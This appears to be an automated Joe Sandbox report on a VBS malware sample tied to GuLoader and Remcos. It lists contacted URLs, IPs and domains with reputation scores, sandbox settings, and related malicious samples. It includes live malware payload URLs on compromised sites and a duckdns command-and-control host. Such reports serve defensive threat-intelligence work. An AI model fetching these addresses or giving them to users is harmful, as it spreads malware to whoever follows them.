https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm | 17% | Virustotal
https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767 | 14% | Virustotal
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Virustotal
http://198.46.176.133 | 14% | Virustotal
http://198.46.176.133 | 0% | Avira URL Cloud | safe
https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767 | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073 | 0% | Avira URL Cloud | safe
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF | 0% | Avira URL Cloud | safe
https://maps.windows.com/windows-app-web-link | 0% | Avira URL Cloud | safe
https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | 14% | Virustotal
https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver= | 14% | Virustotal
https://asociatiatraditiimaria.ro | 0% | Avira URL Cloud | safe
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF | 0% | Virustotal
https://asociatiatraditiimaria.ro/os/transportment.pfm | 100% | Avira URL Cloud | malware
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0 | 100% | Avira URL Cloud | malware
https://aka.ms/pscore6lBjq | 0% | Avira URL Cloud | safe
https://asociatiatraditiimaria.ro | 5% | Virustotal
https://maps.windows.com/windows-app-web-link | 0% | Virustotal
https://asociatiatraditiimaria.ro/os/transportment.pfm | 4% | Virustotal
https://www.google.com | 0% | Virustotal
http://104.168.45.34 | 0% | Avira URL Cloud | safe
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
http://www.imvu.comata | 0% | Avira URL Cloud | safe
iwarsut775laudrye2.duckdns.org | 100% | Avira URL Cloud | malware
https://www.office.com/ | 0% | Avira URL Cloud | safe
http://www.nirsoft.net/ | 0% | Virustotal
http://198.46.176.133/Upload/vbs.jpeg | 100% | Avira URL Cloud | malware
https://asociatiatraditiimaria.ro/comments/feed/ | 0% | Avira URL Cloud | safe
https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e | 0% | Avira URL Cloud | safe
http://104.168.45.34 | 4% | Virustotal
iwarsut775laudrye2.duckdns.org | 19% | Virustotal
https://www.office.com/ | 0% | Virustotal
https://asociatiatraditiimaria.ro/wp-json/ | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | Avira URL Cloud | safe
http://198.46.176.133/Upload/vbs.jpeg | 19% | Virustotal
https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2 | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 1% | Virustotal
https://new.quranushaiqer.org.sa | 100% | Avira URL Cloud | malware
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml | 100% | Avira URL Cloud | malware
https://asociatiatraditiimaria.ro/comments/feed/ | 14% | Virustotal
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud | safe
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
https://asociatiatraditiimaria.ro/wp-json/ | 14% | Virustotal
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | Virustotal
http://104.168.45.34/59/LMTS.txt | 100% | Avira URL Cloud | malware
https://new.quranushaiqer.org.sa | 3% | Virustotal
https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2 | 14% | Virustotal
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
asociatiatraditiimaria.ro | 93.113.54.56 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
iwarsut775laudrye2.duckdns.org | 192.253.251.227 | true | true | | unknown
new.quranushaiqer.org.sa | 34.166.62.190 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm | true | 17% Virustotal; Avira URL Cloud: malware | unknown
https://asociatiatraditiimaria.ro/os/transportment.pfm | true | 4% Virustotal; Avira URL Cloud: malware | unknown
iwarsut775laudrye2.duckdns.org | true | 19% Virustotal; Avira URL Cloud: malware | unknown
http://198.46.176.133/Upload/vbs.jpeg | false | 19% Virustotal; Avira URL Cloud: malware | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://104.168.45.34/59/LMTS.txt | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P | bhvCCC4.tmp.7.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://asociatiatraditiimaria.ro/feed/ | powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | true | 14% Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://198.46.176.133/Upload/vbs.jpegM | powershell.exe, 00000002.00000002.2167362177.000001B1E9A60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | RegAsm.exe, 00000007.00000002.2129094375.00000000010F4000.00000004.00000010.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaotak | bhvCCC4.tmp.7.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver= | powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | true | 14% Virustotal; Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhvCCC4.tmp.7.dr | false | URL Reputation: safe | unknown
https://gmpg.org/xfn/11 | powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767 | powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | true | 14% Virustotal; Avira URL Cloud: safe | unknown
http://198.46.176.133 | powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmp | false | 14% Virustotal; Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | true
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.comRegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073bhvCCC4.tmp.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AFbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://maps.windows.com/windows-app-web-linkbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://asociatiatraditiimaria.ropowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmptrue
                  • 5%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/pscore6lBjqpowershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://login.yahoo.com/config/loginRegAsm.exefalse
                  • URL Reputation: safe
                  unknown
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://104.168.45.34powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.net/RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.imvu.comataRegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.office.com/bhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://asociatiatraditiimaria.ro/comments/feed/powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949ebhvCCC4.tmp.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://api.w.org/powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://asociatiatraditiimaria.ro/wp-json/powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://aefd.nelreports.net/api/report?cat=bingaotbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://new.quranushaiqer.org.sapowershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmlpowershell.exe, 0000000E.00000002.3272352105.00000000053D6000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  https://aefd.nelreports.net/api/report?cat=bingrmsbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/accounts/serviceloginRegAsm.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  34.166.62.190 | new.quranushaiqer.org.sa | United States | 2686 | ATGS-MMD-ASUS | false
                  93.113.54.56 | asociatiatraditiimaria.ro | Romania | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
                  192.253.251.227 | iwarsut775laudrye2.duckdns.org | United States | 50613 | THORDC-ASIS | true
                  198.46.176.133 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
                  178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                  104.168.45.34 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
                  Joe Sandbox version: 40.0.0 Tourmaline
                  Analysis ID: 1483434
                  Start date and time: 2024-07-27 13:30:11 +02:00
                  Joe Sandbox product: CloudBasic
                  Overall analysis duration: 0h 9m 20s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed: 18
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Sample name: createdthingstobefrankwithmeeverywhere.gIF.vbs
                  Detection: MAL
                  Classification: mal100.rans.phis.troj.spyw.expl.evad.winVBS@25/16@4/6
                  EGA Information:
                  • Successful, ratio: 83.3%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 155
                  • Number of non-executed functions: 332
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 199.232.214.172
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7244 because it is empty
                  • Not all processes were analyzed; the report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  Time | Type | Description
                  07:30:57 | API Interceptor | 247729x Sleep call for process: powershell.exe modified
                  07:31:09 | API Interceptor | 1x Sleep call for process: wscript.exe modified
                  07:31:34 | API Interceptor | 1124999x Sleep call for process: RegAsm.exe modified
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  34.166.62.190 | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse |
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse |
                   | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | Get hash | malicious | GuLoader, Remcos | Browse |
                  93.113.54.56 | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse |
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse |
                   | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | Get hash | malicious | GuLoader, Remcos | Browse |
                   | dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs | Get hash | malicious | Unknown | Browse |
                   | dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs | Get hash | malicious | Unknown | Browse |
                   | https://avocat.srl/Auth#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==%25RANDOM5#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==96682=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d%25=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d | Get hash | malicious | Unknown | Browse |
                  192.253.251.227 | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse |
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse |
                   | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | Get hash | malicious | GuLoader, Remcos | Browse |
                   | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse |
                   | UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbs | Get hash | malicious | GuLoader, Remcos | Browse |
                   | ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse |
                   | awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse |
                   | pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse |
                   | awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse |
                   | korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs | Get hash | malicious | GuLoader, Remcos | Browse |
                  198.46.176.133 | createactiveimagesbeautygirlfrnd.gIF.vbs | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | screensimplethingstohandlecream.gIF.vbs | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | creatednewwaterbottleforme.gIF.vbs | Get hash | malicious | Unknown | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | IFqsFpijFt.rtf | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | erthings.doc | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | girlfrnd.doc | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | DHL Shipment Notification 490104998009.xls | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | Purchase Inquiry.xla.xlsx | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                   | AWD 490104998518.xls | Get hash | malicious | Remcos | Browse | 198.46.176.133/Upload/vbs.jpeg
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  new.quranushaiqer.org.sa | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse | 34.166.62.190
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse | 34.166.62.190
                   | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | Get hash | malicious | GuLoader, Remcos | Browse | 34.166.62.190
                  iwarsut775laudrye2.duckdns.org | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.228
                   | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                   | awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbs | Get hash | malicious | GuLoader, Remcos | Browse | 192.253.251.227
                  asociatiatraditiimaria.ro | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse | 93.113.54.56
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse | 93.113.54.56
                   | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | Get hash | malicious | GuLoader, Remcos | Browse | 93.113.54.56
                   | dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs | Get hash | malicious | Unknown | Browse | 93.113.54.56
                   | dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs | Get hash | malicious | Unknown | Browse | 93.113.54.56
                  geoplugin.net | createactiveimagesbeautygirlfrnd.gIF.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
                   | screensimplethingstohandlecream.gIF.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
                   | 41DLTjkmOm.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
                   | Shipping documents PO 16103 INV.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
                   | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
                   | 172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
                   | 1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
                   | erthings.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
                   | girlfrnd.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
                  bg.microsoft.map.fastly.net | https://www.canva.com/design/DAGMDp-pdRs/DFmIVehjt-ABqDbwZmCQ6Q/view?utm_content=DAGMDp-pdRs&utm_campaign=designshare&utm_medium=link&utm_source=editor | Get hash | malicious | HTMLPhisher | Browse | 199.232.214.172
                   | nuCc19sDOl.exe | Get hash | malicious | RedLine | Browse | 199.232.214.172
                   | d34e1p5zD2.exe | Get hash | malicious | Unknown | Browse | 199.232.210.172
                   | QIKiV83Pkl.exe | Get hash | malicious | DCRat | Browse | 199.232.214.172
                   | 41DLTjkmOm.exe | Get hash | malicious | Remcos | Browse | 199.232.210.172
                   | Ycj3d5NMhc.exe | Get hash | malicious | Unknown | Browse | 199.232.214.172
                   | oz9Blof9tN.msi | Get hash | malicious | CobaltStrike | Browse | 199.232.214.172
                   | QUOTATION_JULQTRA071244#U00b7PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 199.232.210.172
                   | invoker.ps1 | Get hash | malicious | Unknown | Browse | 199.232.210.172
                   | http://investors.spotify.com.th.wuush.us.kg/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  GTSCEGTSCentralEuropeAntelGermanyCZ | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | Get hash | malicious | GuLoader, Remcos | Browse | 93.113.54.56
                   | girlfrnd.doc | Get hash | malicious | GuLoader, Remcos | Browse | 93.113.54.56
                   | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | Get hash | malicious | GuLoader, Remcos | Browse | 93.113.54.56
                   | LisectAVT_2403002A_35.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 185.146.87.128
                   | sh4.elf | Get hash | malicious | Mirai | Browse | 195.56.40.173
                   | RiI7W2cj7p.elf | Get hash | malicious | Unknown | Browse | 213.29.127.166
                   | https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.html | Get hash | malicious | CVE-2024-21412 | Browse | 85.9.47.248
                   | KBNCt45Gpk.elf | Get hash | malicious | Mirai | Browse | 212.203.170.235
                   | 5xUAAMwlnJ.elf | Get hash | malicious | Unknown | Browse | 193.86.218.248
                   | COMANDA_AXM_NR17_DIN_240717.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 185.146.87.128
                  AS-COLOCROSSINGUS | createactiveimagesbeautygirlfrnd.gIF.vbs | Get hash | malicious | Remcos | Browse | 198.46.176.133
                   | screensimplethingstohandlecream.gIF.vbs | Get hash | malicious | Remcos | Browse | 192.3.101.142
                   | creatednewwaterbottleforme.gIF.vbs | Get hash | malicious | Unknown | Browse | 198.46.176.133
